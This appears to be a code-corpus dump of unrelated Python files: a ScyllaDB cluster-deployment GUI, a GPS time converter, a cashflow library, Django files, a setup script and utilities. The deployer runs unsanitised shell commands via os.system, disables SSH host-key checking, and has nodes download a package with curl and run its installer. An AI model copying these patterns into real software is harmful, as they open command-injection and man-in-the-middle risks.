        selected_rows = []
        for item in self.node_table.selectedItems():
            selected_rows.append(item.row())
        selected_rows = list(set(selected_rows))
        # delete last item if no item is selected
        if len(selected_rows) == 0:
            self.nodes.pop(-1)
        # delete the selected items
        for i in sorted(selected_rows, reverse=True):
            self.nodes.pop(i)
        self.show_node_table()

    def gen_button_callback(self):
        # Placeholder; not wired to any button.
        pass

    def log(self, cmd):
        # Echo to stdout and forward to the GUI log widget via the signal.
        print(cmd)
        self.sig.log.emit(cmd)

    def run_cmd(self, cmd):
        # Log and execute a shell command (blocking).
        self.log(cmd)
        os.system(cmd)

    def get_ssh(self, user, ip, key, cmd):
        # Build a non-interactive ssh command line for *cmd* on *ip*.
        return f"ssh -i {key} -o StrictHostKeyChecking=no {user}@{ip} {cmd}"

    def get_scp(self, user, ip, key, src, dst):
        # Build a recursive, quiet scp command line copying src to ip:dst.
        return f"scp -i {key} -r -q -o StrictHostKeyChecking=no {src} {user}@{ip}:{dst}"

    def show_cluster_status(self, ip):
        # Log nodetool status output for the cluster reachable via *ip*.
        status = scylla_tools.nodetool_status(ip)
        for node in status:
            self.log(f"{node}")

    def deploy_button_callback(self):
        # Kick off a deployment in the worker pool.
        # NOTE(review): this only logs when a deployment is already running
        # but still submits another one -- confirm whether re-entry should
        # be blocked instead.
        if len(self.depoly_threads) != 0:
            self.log("One running")
        self.log_table.clear()
        t = self.executor.submit(self.do_deploy_button_callback)
        self.depoly_threads.append(t)

    def do_deploy_button_callback(self):
        # Worker-thread body: push the package to every node over SSH/SCP,
        # bootstrap the seed node first, then the remaining nodes in parallel.
        start_time = time.time()
        if not self.nodes:
            return
        cluster = self.get_cluster_info()
        cluster_name = cluster[0]
        ssh_user = cluster[1]
        ssh_key = cluster[2]
        self.log("=== Step 1: Generate config file ===")
        msgs = gen_cluster.gen_cmds(cluster_name, ssh_user, self.get_nodes_info())
        for msg in msgs:
            self.log(msg)
        self.log("=== Step 2: Copy scylla-package.tar.gz ===")
        # Prepare the SSH authorized key firstly
        for info in self.nodes:
            ip = info[0]
            cmd = f"ssh-copy-id -i {ssh_key} -o StrictHostKeyChecking=no {ssh_user}@{ip}"
            self.run_cmd(cmd)
        for info in self.nodes:
            ip = info[0]
            directory = info[4]
            tarball = "scylla-package.tar.gz"
            cmd = self.get_ssh(ssh_user, ip, ssh_key, f"mkdir -p {directory}")
            self.run_cmd(cmd)
            pkg_idx = self.scylla_list.currentIndex()
            if pkg_idx == 0:  # 'Local ./scylla-package.tar.gz'
                cmd = self.get_scp(ssh_user, ip, ssh_key, tarball, directory)
            else:
                # download the selected package directly on the node
                scylla_url = list(scylla_package_list.values())[pkg_idx]
                cmd = self.get_ssh(ssh_user, ip, ssh_key, f'curl -o {directory}/scylla-package.tar.gz {scylla_url}')
            self.run_cmd(cmd)
            cmd = self.get_ssh(ssh_user, ip, ssh_key, f"tar xf {directory}/{tarball} -C {directory}")
            self.run_cmd(cmd)
            cmd = self.get_ssh(ssh_user, ip, ssh_key, f"{directory}/scylla/install.sh --nonroot")
            self.run_cmd(cmd)
            cmd = self.get_scp(ssh_user, ip, ssh_key, f"{CMD_FILE_PREFIX}.{ip}", directory)
            self.run_cmd(cmd)
            cmd = self.get_ssh(ssh_user, ip, ssh_key, f"chmod +x {directory}/{CMD_FILE_PREFIX}.{ip}")
            self.run_cmd(cmd)
        self.log("=== Step 3: Depoly the first node in the cluster ===")
        # The seed node must be up before the others join.
        for info in self.nodes[0:1]:
            ip = info[0]
            directory = info[4]
            node_name = f"{CMD_FILE_PREFIX}.{ip}"
            cmd = self.get_ssh(ssh_user, ip, ssh_key, f"{directory}/{node_name}")
            self.run_cmd(cmd)
        self.log("=== Step 4: Depoly the remaining nodes in the cluster ===")
        threads = []
        for info in self.nodes[1:]:
            ip = info[0]
            directory = info[4]
            node_name = f"{CMD_FILE_PREFIX}.{ip}"
            cmd = self.get_ssh(ssh_user, ip, ssh_key, f"{directory}/{node_name}")
            self.log(cmd)
            p = subprocess.Popen(cmd, shell=True)
            threads.append(p)
        for p in threads:
            p.wait()
        elapsed_time = time.time() - start_time
        msg = f"=== Step 5: Depoly {len(self.nodes)} nodes successfully in {elapsed_time} seconds! ==="
        self.log(msg)
        node = self.nodes[0][0]
        cmd = self.get_ssh(ssh_user, node, ssh_key, '~/scylladb/bin/scylla --version')
        self.run_cmd(cmd)
        self.show_cluster_status(node)

    def get_cluster_header(self):
        """
        Get the apps header to display on the ui
        """
        headers = [u'Cluster Name', u'SSH User', u'SSH Keys']
        return headers

    def show_cluster_table(self):
        """
        Display all the devices
        """
        headers = self.get_cluster_header()
        _DEFAULT_HEADER_SIZE_ = 25
        devices = [1]
        self.cluster_table.clear()
        self.cluster_table.setSortingEnabled(False)
        self.cluster_table.setRowCount(len(devices))
        self.cluster_table.setColumnCount(len(headers))
        self.cluster_table.setHorizontalHeaderLabels(headers)
        self.cluster_table.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)
        self.cluster_table.verticalHeader().setSectionResizeMode(QHeaderView.Fixed)
        self.cluster_table.verticalHeader().setDefaultSectionSize(_DEFAULT_HEADER_SIZE_)
        # Single default row; the user edits it in place.
        apps = [["MyScyllaCluster", os.getenv('USER', 'asias'), "~/.ssh/id_rsa"]]
        row = 0
        for app in apps:
            col = 0
            for it in app:
                item = QTableWidgetItem(it)
                self.cluster_table.setItem(row, col, item)
                col += 1
            row += 1
        self.cluster_table.resizeColumnsToContents()

    def get_node_header(self):
        """
        Get the apps header to display on the ui
        """
        headers = [u'Public IP', u'Private IP', u'DC', u'RACK', u'Data Directory', u'Contact Point(Seed)', u'Num Tokens', u'CPU Cores', u'Memory MB']
        return headers

    def show_node_table(self):
        """
        Display all the devices
        """
        headers = self.get_node_header()
        _DEFAULT_HEADER_SIZE_ = 25
        self.node_table.clear()
        self.node_table.setSortingEnabled(False)
        self.node_table.setRowCount(len(self.nodes))
        self.node_table.setColumnCount(len(headers))
        self.node_table.setHorizontalHeaderLabels(headers)
        self.node_table.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)
        # Display all content of two columns
        self.node_table.horizontalHeader().setSectionResizeMode(4, QHeaderView.ResizeToContents)
        self.node_table.horizontalHeader().setSectionResizeMode(5, QHeaderView.ResizeToContents)
        self.node_table.verticalHeader().setSectionResizeMode(QHeaderView.Fixed)
        self.node_table.verticalHeader().setDefaultSectionSize(_DEFAULT_HEADER_SIZE_)
        row = 0
        for node in self.nodes:
            col = 0
            for it in node:
                item = QTableWidgetItem(it)
                self.node_table.setItem(row, col, item)
                col += 1
            row += 1
        #self.node_table.resizeColumnsToContents()
if __name__ == '__main__':
    # Restore default Ctrl+C handling so the Qt event loop can be killed
    # from the terminal, then start the GUI.
    signal.signal(signal.SIGINT, signal.SIG_DFL)
    app = QApplication(sys.argv)
    w = MyMainWindow(app)
    w.show()
    app.exec_()
| 1.96875 | 2 |
gravityspytools/collectioninfo/timeconvert.py | olipatane/gravityspytools | 0 | 12761014 | <filename>gravityspytools/collectioninfo/timeconvert.py
import datetime
# Define GPS leap seconds
def getleaps():
    """Return the GPS timestamps at which each leap second took effect.

    Values are seconds since the GPS epoch (1980-01-06), in chronological
    order; the table ends with the 2017-01-01 leap second.
    """
    return [
        46828800, 78364801, 109900802, 173059203, 252028804,
        315187205, 346723206, 393984007, 425520008, 457056009,
        504489610, 551750411, 599184012, 820108813, 914803214,
        1025136015, 1119744016, 1167264017,
    ]
# Test to see if a GPS second is a leap second
def isleap(gpsTime):
    """Return True iff *gpsTime* is exactly a GPS leap-second instant.

    Bug fix: the original compared with ``gpsTime is i`` -- an object
    *identity* test, which is not guaranteed to be True for equal ints
    (and is essentially always False for large ints created separately),
    so the check silently never matched.  Membership/equality is the
    correct test.
    """
    return gpsTime in getleaps()
# Count number of leap seconds that have passed
def countleaps(gpsTime, dirFlag):
    """Count the leap seconds that occurred prior to *gpsTime*.

    *dirFlag* selects the direction of the surrounding conversion:
    ``'unix2gps'`` compensates for leaps not yet included in the input
    timestamp (hence the ``- i`` offset per the standard algorithm),
    while ``'gps2unix'`` counts leaps already included in a GPS timestamp.

    Bug fix: the original tested ``'unix2gps' is not dirFlag`` /
    ``'gps2unix' is not dirFlag`` -- identity comparisons on strings that
    also *inverted* the branch selection, so each direction applied the
    other direction's formula.  Plain equality restores the intended
    behaviour.
    """
    leaps = getleaps()
    nleaps = 0  # number of leap seconds prior to gpsTime
    for i in range(len(leaps)):
        if dirFlag == 'unix2gps':
            if gpsTime >= leaps[i] - i:
                nleaps += 1
        elif dirFlag == 'gps2unix':
            if gpsTime >= leaps[i]:
                nleaps += 1
        else:
            # preserved behaviour: report (per iteration) rather than raise
            print('ERROR Invalid Flag!')
    return nleaps
# Convert GPS Time to Unix Time
def gps2unix(gpsTime):
    """Convert a GPS timestamp to Unix time.

    Adds the fixed epoch offset (the GPS epoch 1980-01-06T00:00:00Z lies
    315964800 s after the Unix epoch), subtracts the leap seconds elapsed
    since then, and maps a GPS time that *is* a leap second onto the
    half-second mark.
    """
    unixTime = gpsTime + 315964800 - countleaps(gpsTime, 'gps2unix')
    if isleap(gpsTime):
        unixTime += 0.5
    return unixTime
def gps2ppl(gpsTime):
    # Human-readable 'YYYY-MM-DD HH:MM' string for a GPS timestamp.
    # NOTE(review): datetime.fromtimestamp uses the host's *local* timezone,
    # so the output depends on TZ -- confirm UTC is not expected here.
    return datetime.datetime.fromtimestamp(int(gps2unix(gpsTime)))\
        .strftime('%Y-%m-%d %H:%M')
| 3.09375 | 3 |
dcf/cashflows/cashflow.py | pbrisk/dcf | 7 | 12761015 | # -*- coding: utf-8 -*-
# dcf
# ---
# A Python library for generating discounted cashflows.
#
# Author: sonntagsgesicht, based on a fork of Deutsche Postbank [pbrisk]
# Version: 0.7, copyright Tuesday, 31 May 2022
# Website: https://github.com/sonntagsgesicht/dcf
# License: Apache License 2.0 (see LICENSE file)
from collections import OrderedDict
from inspect import signature
from warnings import warn
from ..plans import DEFAULT_AMOUNT
from .payoffs import FixedCashFlowPayOff, RateCashFlowPayOff
class CashFlowList(object):
    # column order used (and filtered) by the |table| property;
    # subclasses override this to report richer payoff details
    _cashflow_details = 'cashflow', 'pay date'

    @property
    def table(self):
        """ cashflow details as list of tuples """
        # print(tabulate(cf.table, headers='firstrow')) # for pretty print
        header, table = list(), list()
        for d in self.domain:
            payoff = self._flows.get(d, 0.)
            if hasattr(payoff, 'details'):
                # payoff objects expose rich details; plain numbers do not
                fwd = getattr(self, 'forward_curve', None)
                details = payoff.details(fwd)
                details['pay date'] = d
            else:
                details = {'cashflow': float(payoff), 'pay date': d}
            for k in self.__class__._cashflow_details:
                if k in details and k not in header:
                    header.append(k)
            # NOTE(review): each row is built against the header as grown so
            # far, so earlier rows can have fewer columns than later ones.
            table.append(tuple(details.get(h, '') for h in header))
        return [tuple(header)] + table

    @property
    def domain(self):
        """ payment date list """
        return self._domain

    @property
    def origin(self):
        """ cashflow list start date """
        # fall back to the first payment date when no explicit origin is set
        if self._origin is None and self._domain:
            return self._domain[0]
        return self._origin

    @property
    def kwargs(self):
        """returns constructor arguments as ordered dictionary
        (under construction)
        """
        warn('%s().kwargs is under construction' % self.__class__.__name__)
        kw = OrderedDict()
        # walk the constructor signature and recover each argument either
        # from the flows/domain or from a privately stored attribute
        for name in signature(self.__class__).parameters:
            attr = None
            if name == 'amount_list':
                attr = tuple(self._flows[d] for d in self.domain)
            if name == 'payment_date_list':
                attr = self.domain
            attr = getattr(self, '_' + name, attr)
            if isinstance(attr, (list, tuple)):
                # replace nested objects by their own kwargs or name
                attr = tuple(getattr(a, 'kwargs', a) for a in attr)
                attr = tuple(getattr(a, '__name__', a) for a in attr)
            attr = getattr(attr, 'kwargs', attr)
            attr = getattr(attr, '__name__', attr)
            if attr is not None:
                kw[name] = attr
        return kw

    def payoff(self, date):
        """dictionary of payoffs with pay_date keys"""
        if isinstance(date, (tuple, list)):
            return tuple(self.payoff(i) for i in date)
        return self._flows.get(date, None)

    def __init__(self, payment_date_list=(), amount_list=(), origin=None):
        """ basic cashflow list object

        :param domain: list of cashflow dates
        :param data: list of cashflow amounts
        :param origin: origin of object,
            i.e. start date of the cashflow list as a product

        Basicly |CashFlowList()| works like a read-only dictionary
        with payment dates as keys.

        And the |CashFlowList().domain| property holds the payment date list.

        >>> from dcf import CashFlowList
        >>> cf_list = CashFlowList([0, 1], [-100., 100.])
        >>> cf_list.domain
        (0, 1)

        In order to get cashflows

        >>> cf_list[0]
        -100.0
        >>> cf_list[cf_list.domain]
        (-100.0, 100.0)

        This works even for dates without cashflow

        >>> cf_list[-1, 0 , 1, 2]
        (0.0, -100.0, 100.0, 0.0)
        """
        if isinstance(amount_list, (int, float)):
            # broadcast a scalar amount to every payment date
            amount_list = [amount_list] * len(payment_date_list)
        if not len(amount_list) == len(payment_date_list):
            msg = f"{self.__class__.__name__} arguments " \
                  f"`payment_date_list` and `amount_list` " \
                  f"must have same length."
            raise ValueError(msg)
        self._origin = origin
        self._domain = tuple(payment_date_list)
        self._flows = dict(zip(payment_date_list, amount_list))

    def __getitem__(self, item):
        # return the (evaluated) cashflow paid at *item*; for a tuple/list
        # of dates, return a tuple of cashflows (0. for dates without flow)
        if isinstance(item, (tuple, list)):
            return tuple(self[i] for i in item)
        else:
            payoff = self._flows.get(item, 0.)
            if not isinstance(payoff, (int, float)):
                # payoff objects are evaluated against the attached
                # payoff model or forward curve (if any)
                _ = None
                if hasattr(self, 'payoff_model'):
                    _ = self.payoff_model
                elif hasattr(self, 'forward_curve'):
                    _ = self.forward_curve
                payoff = payoff(_)
            return payoff

    def __call__(self, _=None):
        # evaluate every payoff (with the given model *_* or the attached
        # payoff_model/forward_curve) and return a plain CashFlowList
        flows = list()
        for item in self.domain:
            payoff = self._flows.get(item, 0.)
            if not isinstance(payoff, (int, float)):
                if _ is None:
                    if hasattr(self, 'payoff_model'):
                        _ = self.payoff_model
                    elif hasattr(self, 'forward_curve'):
                        _ = self.forward_curve
                payoff = payoff(_)
            flows.append(payoff)
        return CashFlowList(self.domain, flows, self._origin)

    def __add__(self, other):
        # NOTE(review): this delegates to each payoff's __add__ but discards
        # the result and returns None, so `a + b` evaluates to None --
        # confirm whether in-place mutation of the payoffs was intended.
        for k in self._flows:
            self._flows[k].__add__(other)

    def __sub__(self, other):
        # NOTE(review): same caveat as __add__ (result discarded, None).
        for k in self._flows:
            self._flows[k].__sub__(other)

    def __mul__(self, other):
        # NOTE(review): same caveat as __add__ (result discarded, None).
        for k in self._flows:
            self._flows[k].__mul__(other)

    def __truediv__(self, other):
        # NOTE(review): same caveat as __add__ (result discarded, None).
        for k in self._flows:
            self._flows[k].__truediv__(other)

    def __str__(self):
        # compact one-line summary: first/last pay date and flows plus any
        # remaining constructor kwargs
        inner = tuple()
        if self.domain:
            s, e = self.domain[0], self.domain[-1]
            inner = f'[{s!r} ... {e!r}]', \
                    f'[{self._flows[s]!r} ... {self._flows[e]!r}]'
        kw = self.kwargs
        kw.pop('amount_list', ())
        kw.pop('payment_date_list', ())
        inner += tuple(f"{k!s}={v!r}" for k, v in kw.items())
        s = self.__class__.__name__ + '(' + ', '.join(inner) + ')'
        return s

    def __repr__(self):
        # multi-line constructor-style representation with full lists
        s = self.__class__.__name__ + '()'
        if self.domain:
            fill = ',\n' + ' ' * (len(s) - 1)
            kw = self.kwargs
            inner = \
                str(kw.pop('payment_date_list', ())), \
                str(kw.pop('amount_list', ()))
            inner += tuple(f"{k!s}={v!r}" for k, v in kw.items())
            s = self.__class__.__name__ + '(' + fill.join(inner) + ')'
        return s
class CashFlowLegList(CashFlowList):
    """ MultiCashFlowList """

    @property
    def legs(self):
        """ list of |CashFlowList| """
        return list(self._legs)

    def __init__(self, legs):
        """ container class for CashFlowList

        :param legs: list of |CashFlowList|
        """
        # NOTE(review): the error message text reads oddly ("Legs %s of can
        # be either") -- probably meant "Legs of %s can be either".
        for leg in legs:
            if not isinstance(leg, (CashFlowList, RateCashFlowList)):
                cls = self.__class__.__name__, leg.__class__.__name__
                raise ValueError("Legs %s of can be either `CashFlowList` "
                                 "or `RateCashFlowList` but not %s." % cls)
        self._legs = legs
        # combined domain: sorted union of all legs' pay dates,
        # with the earliest leg origin as this list's origin
        domains = tuple(tuple(leg.domain) for leg in self._legs)
        domain = list(sorted(set().union(*domains)))
        origin = min(leg.origin for leg in self._legs)
        super().__init__(domain, [0] * len(domain), origin=origin)

    def __getitem__(self, item):
        """ getitem does re-calc float cash flows and
        does not use store notional values """
        if isinstance(item, (tuple, list)):
            return tuple(self[i] for i in item)
        else:
            # sum the contributions of all legs paying on that date
            return sum(
                float(leg[item]) for leg in self._legs if item in leg.domain)

    def __add__(self, other):
        # NOTE(review): as in CashFlowList, these operators mutate/evaluate
        # each leg and return None rather than a new object.
        for leg in self._legs:
            leg.__add__(other)

    def __sub__(self, other):
        for leg in self._legs:
            leg.__sub__(other)

    def __mul__(self, other):
        for leg in self._legs:
            leg.__mul__(other)

    def __truediv__(self, other):
        for leg in self._legs:
            leg.__truediv__(other)
class FixedCashFlowList(CashFlowList):
    # NOTE(review): sibling classes set `_cashflow_details`; `_header_keys`
    # is not read anywhere in this module -- looks like an outdated name.
    _header_keys = 'cashflow', 'pay date'

    def __init__(self, payment_date_list, amount_list=DEFAULT_AMOUNT,
                 origin=None):
        """ basic cashflow list object

        :param payment_date_list: list of cashflow payment dates
        :param amount_list: list of cashflow amounts
        :param origin: origin of object,
            i.e. start date of the cashflow list as a product
        """
        if isinstance(payment_date_list, CashFlowList):
            # copy-construct from another cashflow list: take its evaluated
            # flows, its origin (unless overridden) and its pay dates
            amount_list = payment_date_list[payment_date_list.domain]
            origin = origin or getattr(payment_date_list, '_origin', None)
            payment_date_list = payment_date_list.domain
        if isinstance(amount_list, (int, float)):
            # broadcast a scalar amount to every payment date
            amount_list = [amount_list] * len(payment_date_list)
        # wrap each amount in a FixedCashFlowPayOff
        payoff_list = tuple(FixedCashFlowPayOff(amount=a) for a in amount_list)
        super().__init__(payment_date_list, payoff_list, origin=origin)
class RateCashFlowList(CashFlowList):
    """ list of cashflows by interest rate payments """

    # columns reported by the |table| property
    _cashflow_details = 'cashflow', 'pay date', 'notional', \
        'start date', 'end date', 'year fraction', \
        'fixed rate', 'forward rate', 'fixing date', 'tenor'

    def __init__(self, payment_date_list, amount_list=DEFAULT_AMOUNT,
                 origin=None, day_count=None,
                 fixing_offset=None, pay_offset=None,
                 fixed_rate=0., forward_curve=None):
        r""" list of interest rate cashflows

        :param payment_date_list: pay dates, assuming that pay dates agree
            with end dates of interest accrued period
        :param amount_list: notional amounts
        :param origin: start date of first interest accrued period
        :param day_count: day count convention
        :param fixing_offset: time difference between
            interest rate fixing date and interest period payment date
        :param pay_offset: time difference between
            interest period end date and interest payment date
        :param fixed_rate: agreed fixed rate
        :param forward_curve: interest rate curve for forward estimation

        Let $t_0$ be the list **origin**
        and $t_i$ $i=1, \dots n$ the **payment_date_list**
        with $N_i$ $i=1, \dots n$ the notional **amount_list**.

        Moreover, let $\tau$ be the **day_count** function,
        $c$ the **fixed_rate** and $f$ the **forward_curve**.

        Then, the rate cashflow $cf_i$ payed at time $t_i$ will be
        with
        $s_i = t_{i-1} - \delta$,
        $e_i = t_i -\delta$
        as well as
        $d_i = s_i - \epsilon$
        for **pay_offset** $\delta$ and **fixing_offset** $\epsilon$,

        $$cf_i = N_i \cdot \tau(s_i,e_i) \cdot (c + f(d_i)).$$

        Note, the **pay_offset** $\delta$ is not applied
        in case of the first cashflow, then $s_1=t_0$.
        """
        if isinstance(amount_list, (int, float)):
            # broadcast a scalar notional to every payment date
            amount_list = [amount_list] * len(payment_date_list)

        # derive accrual start dates: each period starts at the previous
        # payment date; the first period starts at `origin`, or at a
        # synthetic date one period before the first pay date
        if origin is not None:
            start_dates = [origin]
            start_dates.extend(payment_date_list[:-1])
        elif len(payment_date_list) > 1:
            step = payment_date_list[1] - payment_date_list[0]
            start_dates = [payment_date_list[0] - step]
            start_dates.extend(payment_date_list[:-1])
        else:
            # zero or one payment date and no origin: start dates coincide
            # with the pay dates.
            # (bug fix: previously an empty `payment_date_list` left
            # `start_dates` unbound, raising NameError in the zip below)
            start_dates = list(payment_date_list)

        payoff_list = list()
        for s, e, a in zip(start_dates, payment_date_list, amount_list):
            if pay_offset:
                # NOTE(review): the docstring states the pay offset is not
                # applied to the first period ($s_1=t_0$), but every period
                # including the first is shifted here -- confirm intent.
                e -= pay_offset
                s -= pay_offset
            payoff = RateCashFlowPayOff(
                start=s, end=e, day_count=day_count,
                fixing_offset=fixing_offset, amount=a,
                fixed_rate=fixed_rate
            )
            payoff_list.append(payoff)
        super().__init__(payment_date_list, payoff_list, origin=origin)
        # interest rate curve used to estimate the forward rates $f$
        self.forward_curve = forward_curve

    @property
    def fixed_rate(self):
        # the single fixed rate shared by all payoffs,
        # or None when the payoffs disagree
        fixed_rates = tuple(cf.fixed_rate for cf in self._flows.values())
        if len(set(fixed_rates)) == 1:
            return fixed_rates[0]

    @fixed_rate.setter
    def fixed_rate(self, value):
        # propagate the new fixed rate to every payoff in the list
        for cf in self._flows.values():
            cf.fixed_rate = value
oosc/oosc/counties/admin.py | C4DLabOrg/da_api | 0 | 12761016 | <reponame>C4DLabOrg/da_api
from django.contrib import admin
from oosc.counties.models import Counties
# Register your models here.
class classAdmin(admin.ModelAdmin):
    # Columns shown on the Counties changelist page in the Django admin.
    # NOTE(review): the class name breaks PEP 8 (should be e.g.
    # CountiesAdmin); renaming would also require updating the register()
    # call below.
    list_display = ['county_name', 'id', 'lat', 'lng']


admin.site.register(Counties, classAdmin);
| 1.890625 | 2 |
contacts/migrations/0001_initial.py | Ratgor/iLikeit-voting-platform | 0 | 12761017 | <gh_stars>0
# Generated by Django 3.1.2 on 2021-02-13 16:28
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial schema for the contacts app: creates Contact and Feature."""
    initial = True
    dependencies = [
        # Depends on whichever user model the project has configured.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        migrations.CreateModel(
            name='Contact',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # NOTE(review): null=True has no effect on ManyToManyField
                # (Django warning W340) — consider dropping it on the next
                # hand-written schema change (do not edit this migration).
                ('owners', models.ManyToManyField(blank=True, null=True, related_name='contacts', to=settings.AUTH_USER_MODEL)),
                ('relatedUsers', models.ManyToManyField(blank=True, null=True, related_name='relatedUsers', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Feature',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('header', models.TextField(blank=True, null=True)),
                ('content', models.TextField(blank=True, null=True)),
                ('tags', models.JSONField(blank=True, null=True)),
                # Creation timestamp, set automatically on insert.
                ('date', models.DateTimeField(auto_now_add=True)),
                ('verified', models.BooleanField(default=False)),
                ('encrypted', models.BooleanField(default=True)),
                ('relatedContacts', models.ManyToManyField(blank=True, null=True, related_name='contacts', to='contacts.Contact')),
            ],
        ),
    ]
| 1.851563 | 2 |
SSLChecker/sharedcode/results.py | tdensmore/SSLChecker | 0 | 12761018 | # Setters for the results dictionary
def set_error(name, message):
    """Build the error payload for host *name* with *message*.

    Stores the result in the module-level global ``_error`` (kept for any
    callers that read it) and returns it.  The original also assigned an
    empty dict first, which was immediately overwritten — removed as dead
    code.
    """
    global _error
    _error = {"Hostname": name, "Message": message}
    return _error
def new():
    """Return a fresh, empty scan-result record.

    Keys: Hostname, IP, MD5, View (all None until filled in) and Results,
    a new empty list of cipher entries.
    """
    return dict(Hostname=None, IP=None, MD5=None, View=None, Results=[])
def set_result(results, key, value):
    """Store *value* under *key* in the results record (in place)."""
    results.update({key: value})
def set_ciphers(results, value):
    """Append one cipher entry to the record's 'Results' list (in place)."""
    results['Results'] += [value]
| 2.71875 | 3 |
setup.py | marineam/nagcat | 0 | 12761019 | #!/usr/bin/env python
import os
import stat
from glob import glob
from distutils import log
from distutils.core import setup
from distutils.extension import Extension
from distutils.command.build_py import build_py as du_build_py
from twisted.python.dist import getPackages
# distutils doesn't provide a way to make some package data executable
# but nagcat requires a test script for unit testing, so hack time.
package_scripts = ["python/nagcat/unittests/queries/simple_subprocess"]
class build_py(du_build_py):
    """build_py variant that also marks selected package data executable.

    distutils has no way to make package data executable, but nagcat ships a
    test helper script as package data, so copy_file chmods it after copying.
    """

    def copy_file(self, infile, outfile, **kwargs):
        """Copy *infile* to *outfile*, then chmod +x files in package_scripts.

        Ripped out of install_scripts, might as well be consistent.
        """
        du_build_py.copy_file(self, infile, outfile, **kwargs)
        if os.name == 'posix' and infile in package_scripts:
            if self.dry_run:
                log.info("changing mode of %s", outfile)
            else:
                # 0o555/0o7777 replace the legacy octal literals 0555/07777,
                # which are a syntax error on Python 3 (the 0o form has been
                # valid since Python 2.6, so behavior is unchanged).
                mode = ((os.stat(outfile)[stat.ST_MODE]) | 0o555) & 0o7777
                log.info("changing mode of %s to %o", outfile, mode)
                os.chmod(outfile, mode)
# Distutils metadata.  Note the non-standard "python/" source root mapped via
# package_dir, and the executable test helper shipped via package_data (made
# executable by the custom build_py above).
setup_args = dict(
    name = "nagcat",
    author = "<NAME>",
    author_email = "<EMAIL>",
    url = "http://code.google.com/p/nagcat/",
    license = "Apache 2.0",
    packages = getPackages("python/nagcat") +
            getPackages("python/snapy") +
            getPackages("python/twirrdy"),
    package_data = {'nagcat': ["plugins/dropin.cache",
                               "unittests/trend_data*",
                               "unittests/ssl/*",
                               "unittests/queries/oracle_package.sql",
                               "unittests/queries/simple_subprocess"],
                    'snapy': ["netsnmp/unittests/snmpd.conf"]},
    package_dir = {'': "python"},
    scripts = glob("bin/*"),
    data_files = [('share/doc/nagcat', ["README", "LICENSE"]),
                  ('share/doc/nagcat/docs', glob("docs/*.*"))],
    cmdclass = {'build_py': build_py},
)
# Nagcat works without Cython so make it optional: only build the
# C-accelerated object parser extension when Cython is importable.
try:
    from Cython.Distutils import build_ext
    setup_args['ext_modules'] = [Extension("nagcat._object_parser_c",
        ["python/nagcat/_object_parser_c.pyx"])]
    setup_args['cmdclass']['build_ext'] = build_ext
except ImportError:
    # No Cython installed: ship the pure-Python parser only.
    pass
setup(**setup_args)
| 1.84375 | 2 |
nonrepeating.py | crsiebler/NonRepeatingString | 0 | 12761020 | <filename>nonrepeating.py
from queue import Queue
"""Script to find the first non-repeating string in a stream.
This module reads a file called stream.txt to create a stream of strings. As a string is received, return the first
non-repeating string in the stream.
Example:
$ python nonrepeating.py
Todo:
* Add input argument for file to parse as stream
* Create separate main so this is separate module
"""
def non_repeating(value, counts, q):
    """Record *value* from the stream and return the first non-repeating string.

    Args:
        value (str): latest string received from the stream.
        counts (dict): running occurrence count per string (mutated in place).
        q (Queue): arrival-ordered strings not yet known to repeat (mutated).

    Returns:
        str: the first string seen exactly once so far, or None when every
        string in the stream has repeated.
    """
    q.put(value)
    counts[value] = counts.get(value, 0) + 1
    # Pop repeated strings off the front; the first survivor is the answer.
    while not q.empty():
        if counts[q.queue[0]] > 1:
            q.get()
        else:
            return q.queue[0]
    # Queue drained: every string seen so far repeats.  (The original had a
    # redundant `if q.empty(): return None` here — the loop condition already
    # guarantees emptiness at this point.)
    return None
def process_stream():
    """Replay stream.txt line by line, printing the first non-repeating
    string after each value is consumed.

    Uses a plain for-loop instead of the original list comprehension, which
    was executed purely for its side effects (an anti-pattern) and built a
    throwaway list of None.
    """
    counts = {}
    q = Queue()
    with open('stream.txt') as stream:
        for value in stream:
            print(non_repeating(value.strip(), counts, q))
def main():
    """Driver method: replay the sample stream from stream.txt."""
    process_stream()
if __name__ == '__main__':
    main()
| 4.0625 | 4 |
src/service/python/perf_test.py | songweijia/cascade | 21 | 12761021 | <reponame>songweijia/cascade<gh_stars>10-100
#!/usr/bin/env python3
import cascade_py
import threading
import time
import math
import sys
import cProfile, pstats, io
class AtomicInteger():
    """A thread-safe integer counter guarded by a lock."""

    def __init__(self, value=0):
        self._value = value
        self._lock = threading.Lock()

    def inc(self):
        """Atomically add one and return the new value."""
        with self._lock:
            self._value += 1
            return self._value

    def dec(self):
        """Atomically subtract one and return the new value."""
        with self._lock:
            self._value -= 1
            return self._value

    @property
    def value(self):
        """Current value, read under the lock."""
        with self._lock:
            return self._value

    @value.setter
    def value(self, v):
        # The original setter ended with `return self._value`; Python discards
        # a property setter's return value, so that line was dead code.
        with self._lock:
            self._value = v
class client_states:
    """Shared state for one benchmark client: send throttling, in-flight
    futures, send/receive timestamp logs and the polling thread that
    completes operations and reports statistics.

    Fixes vs. the original:
    * ``wait_poll_all`` was missing ``self`` and raised TypeError if called.
    * ``future_queue`` was a class-level list shared by all instances; it is
      now created per instance in ``__init__``.
    """
    # 1. transmission depth for throttling the sender (0 for unlimited)
    max_pending_ops = 0
    # 2. message traffic
    num_messages = 0
    message_size = 0
    # 3. tx semaphore
    idle_tx_slot_cv = None
    idle_tx_slot_cnt = None
    idle_tx_slot_mutex = None
    # 4. future queue semaphore
    future_queue = []
    future_queue_cv = None
    future_queue_mutex = None
    # 5. timestamp logs for statistics (microseconds)
    send_tss = []
    recv_tss = []
    # 6. polling thread
    poll_thread = None

    def __init__(self, _max_pending_ops, _num_messages, _message_size):
        self.num_messages = _num_messages
        self.max_pending_ops = _max_pending_ops
        self.message_size = _message_size
        self.idle_tx_slot_cnt = AtomicInteger(_max_pending_ops)
        self.idle_tx_slot_mutex = threading.RLock()
        self.idle_tx_slot_cv = threading.Condition(self.idle_tx_slot_mutex)
        # Fix: per-instance queue; the class attribute list was shared.
        self.future_queue = []
        self.future_queue_mutex = threading.RLock()
